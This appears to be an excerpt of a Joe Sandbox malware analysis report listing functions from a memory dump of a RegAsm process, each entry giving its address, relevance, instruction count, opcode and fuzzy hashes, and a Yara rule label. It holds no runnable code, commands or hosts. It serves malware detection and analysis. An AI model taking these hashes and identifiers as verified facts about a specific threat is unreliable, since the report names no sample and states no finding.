                                        • Opcode Fuzzy Hash: 8100fdb123d3d67b19287db521d51e445f5757672122b2ae3053109a734df6eb
                                        • Instruction Fuzzy Hash: 85321975A04B408FD714DF38C5853ABBBE1AF89314F158A3ED9EB87391D638A445CB06
                                        Function 004038C0 Relevance: .6, Instructions: 600COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68019969ff5d4c7b031af40bff766dd307ec9a2b607195fd915788becbc0be47
                                        • Instruction ID: a966f5733580e1d32f4c65cf1d7ea4f7c70424fa85ad0b362746f1f47da8c6bd
                                        • Opcode Fuzzy Hash: 68019969ff5d4c7b031af40bff766dd307ec9a2b607195fd915788becbc0be47
                                        • Instruction Fuzzy Hash: 51322370914B118FC328CF29C68052ABBF5BF45711B604A2ED6A7A7F90D73AF945CB18
                                        Function 0043CAC0 Relevance: .5, Instructions: 548COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                        • Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
                                        • Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                        • Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86
                                        Function 0043CBD6 Relevance: .5, Instructions: 461COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                        • Instruction ID: 0188f3e029ce03e8205a7a452b25b6dbd5bcd661a0513372e50984eaaf58ab41
                                        • Opcode Fuzzy Hash: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                        • Instruction Fuzzy Hash: 98E12F79B04216CFC704CF68E8906AAB7F2FB8A312F1A847EE585D3351D334A955CB85
                                        Function 00405910 Relevance: .4, Instructions: 449COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                        • Instruction ID: 292f23283d7cd07bb6fd19c8603031892cd16be448e450c68c3e166b8ce1a4f1
                                        • Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                        • Instruction Fuzzy Hash: DAF1CF356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB5A
                                        Function 004380D9 Relevance: .4, Instructions: 422COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93d26f108f2de207715fc6f10add082af5f215719a41695db71f3f1b1a317cd7
                                        • Instruction ID: 7e3e12de7baaa44855f8db402cbcde809cdcecebdba36db7e067ef3f383e20fe
                                        • Opcode Fuzzy Hash: 93d26f108f2de207715fc6f10add082af5f215719a41695db71f3f1b1a317cd7
                                        • Instruction Fuzzy Hash: 81D1047A614352DBCB185F38EC51267B3E1FF4A701F4A88BDD881872A0F7BAC9508755
                                        Function 004081F0 Relevance: .4, Instructions: 408COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff2cf1cd491ada9ea90d45eb0a802c840e982093fe7b1125ecbb9c6834ee2d8a
                                        • Instruction ID: 8f523c3615630e9e86e7780e2c956a708ca21de1340e8773491381c9913ea244
                                        • Opcode Fuzzy Hash: ff2cf1cd491ada9ea90d45eb0a802c840e982093fe7b1125ecbb9c6834ee2d8a
                                        • Instruction Fuzzy Hash: BFE12B716087415BC318CE29D9E026FFBD2ABC5320F18CA6EE4E6573E5EB3889058B45
                                        Function 0043CCE0 Relevance: .4, Instructions: 394COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                        • Instruction ID: b7c2eaf3338182462aad9b41d84ad1057b9f4e6ab3b7739cdaab2d2094e4d2b6
                                        • Opcode Fuzzy Hash: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                        • Instruction Fuzzy Hash: 36C1007AA04216CFC704CF28E8906AAB7F2FB8A311F1A447DE98593351D734ED54CB85
                                        Function 004286F0 Relevance: .4, Instructions: 392COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                        • Instruction ID: 56b07d3b8ecf2697cfceb0b79347f06369642de1c8fee68a0e9743baf01ab03d
                                        • Opcode Fuzzy Hash: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                        • Instruction Fuzzy Hash: 46C12EB060D3218AC314DF14D86272BB7F2EF92364F44891DF0D19B395EB789905CB9A
                                        Function 0043CD60 Relevance: .4, Instructions: 355COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                        • Instruction ID: 20c8691d40d2db25294344e9a87d3a2a4619c2758e90d916e0ff6e9b3fbd9dce
                                        • Opcode Fuzzy Hash: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                        • Instruction Fuzzy Hash: 95B1FE7AA14216CFC704CF68E8906AAB7F1FB8A311F1A447EE98693350D734ED54CB85
                                        Function 0043E2C0 Relevance: .3, Instructions: 349COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 80da30ceeb4076c4dd52f36f413b417ec497b075dc979d5065cc3afacb8a27d8
                                        • Instruction ID: 21034efda10b007e5f49382b2671dc2907a6127a70d9abf3c6f7e0d751ba39ee
                                        • Opcode Fuzzy Hash: 80da30ceeb4076c4dd52f36f413b417ec497b075dc979d5065cc3afacb8a27d8
                                        • Instruction Fuzzy Hash: 49B127357093559FC724CF26C890A6BB7E2AFE9314F19D63DE885473A2DA389C01C789
                                        Function 00416B7E Relevance: .3, Instructions: 335COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                        • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                        • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                        • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                        Function 0043CE00 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                        • Instruction ID: 02c91c5c175dbfc798e5ae80a92b3f6d79b9f3e28c5cee1d4de64ad44bd3bbdb
                                        • Opcode Fuzzy Hash: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                        • Instruction Fuzzy Hash: 28B1FE79A08216CFC704CF28E8906AAB7F1FB8A311F1A487DE985D3350D734E955CB95
                                        Function 00416E97 Relevance: .3, Instructions: 316COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                        • Instruction ID: 5a7d6a52498181c9cf4f87941996139a214d8b31775e9e11dc627d5a44ad725e
                                        • Opcode Fuzzy Hash: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                        • Instruction Fuzzy Hash: 73A143B46047418FD724CF29C8D1B63B7E2AB5A304F14892ED59A87792D338E886CB58
                                        Function 00418C1E Relevance: .3, Instructions: 307COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ebcc1277a189ea59c5b32380fd9c8b1ec5899579a2fb8002ac174b8badf3d8a
                                        • Instruction ID: d9bed95716bb0f9021933fded373194d370365f97eec4729a86d8bb3d406bb7e
                                        • Opcode Fuzzy Hash: 9ebcc1277a189ea59c5b32380fd9c8b1ec5899579a2fb8002ac174b8badf3d8a
                                        • Instruction Fuzzy Hash: E1B1E0755007018FC724CF29C8817A3B7F2FF95711B1A856ED8968B7A4DB38E842CB15
                                        Function 00406200 Relevance: .3, Instructions: 303COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc1db6a217cb8f63b2a4c53b2a12e6814aef47cb0c90e13827f5475dc9e5d2a9
                                        • Instruction ID: 9bcc022de37c7c20ffa72b1ba7d3b9ce0567420977cb9b754fa16163635bd775
                                        • Opcode Fuzzy Hash: dc1db6a217cb8f63b2a4c53b2a12e6814aef47cb0c90e13827f5475dc9e5d2a9
                                        • Instruction Fuzzy Hash: 12C16BB29087418FC320CF28DC96BABB7E1BF85318F09493DD1DAD6242E778A155CB46
                                        Function 0043DFB0 Relevance: .3, Instructions: 274COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                        • Instruction ID: 9eaef7f6449a926bdd011e6bf6c7dc343cb48eef6fbbacc1f9e318c96c7b604e
                                        • Opcode Fuzzy Hash: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                        • Instruction Fuzzy Hash: 6891DF356053118BC718DF1AC890A2BB3F6EF9D710F19996DE8858B391E734EC01CB86
                                        Function 0043DCF0 Relevance: .3, Instructions: 272COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                        • Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
                                        • Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                        • Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
                                        Function 00428F5D Relevance: .3, Instructions: 257COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                        • Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
                                        • Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                        • Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A
                                        Function 0040CA54 Relevance: .2, Instructions: 247COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7c9feb5511229040c6975bef0832900e3bf4da7ad8fb78105c9272307aa1f26
                                        • Instruction ID: b41f02f2f6b88e6cf2e509950ca0ce26243347fadfbd22f941e0e6fdafa6cfa2
                                        • Opcode Fuzzy Hash: e7c9feb5511229040c6975bef0832900e3bf4da7ad8fb78105c9272307aa1f26
                                        • Instruction Fuzzy Hash: A3513675548311CBCB24CF14D8D15AB7B72FF9672031992ACCC816F3A9E7399802CBA9
                                        Function 0040B351 Relevance: .2, Instructions: 243COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdd013215ce92ec85f43de91537993578af9f61c73a475c81e3a5f35ac2d727d
                                        • Instruction ID: 89dc32996bb4f82fd83524c80daa36c237ca6d893dcf29b64c3826ebf43fb3a5
                                        • Opcode Fuzzy Hash: fdd013215ce92ec85f43de91537993578af9f61c73a475c81e3a5f35ac2d727d
                                        • Instruction Fuzzy Hash: DF817276650B018FC324CF29DC52757B7E6FB89314B188A3DE5A6C7BA0D778E4018B44
                                        Function 00439B90 Relevance: .2, Instructions: 236COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 971fb4683366840521f2c77239d6da1bf588dd11a8c1239e3b899356031a604b
                                        • Instruction ID: c4b29f3e4ef49d663a7ff3a53f189fc49867f14e84c221a6ac5e24e09d39c3ba
                                        • Opcode Fuzzy Hash: 971fb4683366840521f2c77239d6da1bf588dd11a8c1239e3b899356031a604b
                                        • Instruction Fuzzy Hash: 80618B766083005FD728DF29D891B7BB793EBD8304F2D942ED5868B351EA75AC01CB89
                                        Function 004167A5 Relevance: .2, Instructions: 233COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: c76afdc892be6a1a22571e9230be0a7238928ff2fae107023b2858cfdd5236c6
                                        • Instruction ID: 6ba4ddecef610ba5b17dae5e44720f787bbaa8a1dff5678383cb1f2fa5ad10f1
                                        • Opcode Fuzzy Hash: c76afdc892be6a1a22571e9230be0a7238928ff2fae107023b2858cfdd5236c6
                                        • Instruction Fuzzy Hash: 6A519C782067008FE7258F59C991B737792FBA5300F1A947EDA864B752C378EC81CB59
                                        Function 0041D8E0 Relevance: .2, Instructions: 227COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7078c05123f608065ae0c8b19dd9d3873ceae3ccd1b74ae0e505b84a43bf3eb5
                                        • Instruction ID: 30120c9cf8979c957b93fa690c701cca16999ac69deab4180fe86e3e7b3b6d10
                                        • Opcode Fuzzy Hash: 7078c05123f608065ae0c8b19dd9d3873ceae3ccd1b74ae0e505b84a43bf3eb5
                                        • Instruction Fuzzy Hash: 4C714873A5DAD047D328893C4C112EABA930BD7234F2DC77AE9F5873E1D5694C458349
                                        Function 00425670 Relevance: .2, Instructions: 218COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 268e6a86c9647423a3e0406f1efe1fb1f3a43167bedebd64417b2eb9c2239687
                                        • Instruction ID: 977b48f6b738fa56d71fc5e64f14f9e1e09c3987245fa55f05f3730c3b5c7a7c
                                        • Opcode Fuzzy Hash: 268e6a86c9647423a3e0406f1efe1fb1f3a43167bedebd64417b2eb9c2239687
                                        • Instruction Fuzzy Hash: 2261F5B02083109FD714EF15E89166BB7F1EF92364F94891DE4C58B3A1E7788905CB5B
                                        Function 00436430 Relevance: .2, Instructions: 189COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                                        • Instruction ID: 18207ba011b0b7ea27b2fff4e18c5af6e6a605bfb9f785221dc3cd9b7063f5aa
                                        • Opcode Fuzzy Hash: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                                        • Instruction Fuzzy Hash: CF517DB15087549FE314DF29D49435BBBE1BBC8318F054A2EE5E987390E379DA088F86
                                        Function 0041CEA5 Relevance: .2, Instructions: 188COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                        • Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
                                        • Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                        • Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A
                                        Function 0041AE00 Relevance: .2, Instructions: 186COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a46d2b8bf1cae4ec2dafeae2869696359aca197a34deded2bf42c97d4dc29283
                                        • Instruction ID: 829a281dbcc55e7f17534855474bf5a201807c2c6bc85185d11bf04c5e7b1d41
                                        • Opcode Fuzzy Hash: a46d2b8bf1cae4ec2dafeae2869696359aca197a34deded2bf42c97d4dc29283
                                        • Instruction Fuzzy Hash: 4A515A3375AA8047D33C893C5C213EA6E834FD7234B2D836FE1B6873E1D5694856434A
                                        Function 0041DC20 Relevance: .2, Instructions: 184COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45e0e103b9fa75d561094886c53ba12757ccee8c771bf6786106a20a4d2ac4a
                                        • Instruction ID: 4a7e784b138b87771e031b0ab493134f230d0f6451cb6a1be6cc007881fd3753
                                        • Opcode Fuzzy Hash: b45e0e103b9fa75d561094886c53ba12757ccee8c771bf6786106a20a4d2ac4a
                                        • Instruction Fuzzy Hash: A8512877F599814BD3288A3C5C213E66E934BE3330B2CC76FE5B28B3E4D5A948468345
                                        Function 00427307 Relevance: .2, Instructions: 174COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                        • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                        • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                        • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                        Function 00408990 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 367c31638055309794f69e9f1362a6cfb166745821b7f7e74973013f3529307c
                                        • Instruction ID: ebb8bf1014c79c05d079e5db2d04c22336d3239a7eed9d6647c290466499aa9f
                                        • Opcode Fuzzy Hash: 367c31638055309794f69e9f1362a6cfb166745821b7f7e74973013f3529307c
                                        • Instruction Fuzzy Hash: D0316333A218114AE754CA29CD0479632D3ABD9328F3ECAB9D465DF6D7CD3B9D138680
                                        Function 004292D0 Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                        • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                        • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                        • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                        Function 00436B20 Relevance: .1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                        • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                        • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                        • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                        Function 0041597D Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                        • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                        • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                        • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
